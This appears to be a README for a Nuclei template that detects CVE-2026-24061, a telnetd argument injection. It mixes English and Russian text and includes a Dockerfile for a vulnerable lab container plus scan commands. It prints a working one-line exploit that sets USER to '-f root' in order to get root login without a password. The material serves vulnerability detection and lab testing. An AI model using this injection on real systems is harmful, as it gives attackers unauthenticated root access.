
Nuclei template for detecting CVE-2026-24061, a critical telnet argument injection in GNU inetutils telnetd allowing unauthenticated root access.
Nuclei template для обнаружения уязвимости CVE-2026-24061 в GNU inetutils telnetd, позволяющей получить root доступ без аутентификации.
CVE-2026-24061 - это критическая уязвимость argument injection в GNU inetutils telnetd, которая позволяет атакующему получить root shell без знания пароля.
%U: /usr/bin/login -p -h %h %?u{-f %u}{%U}
Уязвимость: Переменная окружения USER передаётся через telnet протокол (RFC 1572 NEW-ENVIRON) и не санитизируется перед подстановкой в команду.
Эксплуатация: Атакующий устанавливает USER="-f root" при подключении:
USER="-f root" telnet -a target.com 23
/usr/bin/login -p -h hostname -f root
Флаг -f означает "skip authentication" → root без пароля 💀
inetutils-telnetd 2:2.0-1+deb11u2nuclei -t cve-2026-24061.yaml -u target.com:23 -code
nuclei -t cve-2026-24061.yaml -l targets.txt -code
Для тестирования можно поднять уязвимый Docker контейнер:
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
Запуск:
# Собрать образ
docker build -t vuln-telnetd .
# Запустить
docker run -d -p 2323:23 vuln-telnetd
# Проверить уязвимость
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v
9.8 / 10 - Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Этот инструмент предназначен только для легального тестирования безопасности систем, на которые у вас есть явное разрешение.
Автор не несёт ответственности за неправомерное использование данного шаблона.
Created by Mr.Zapi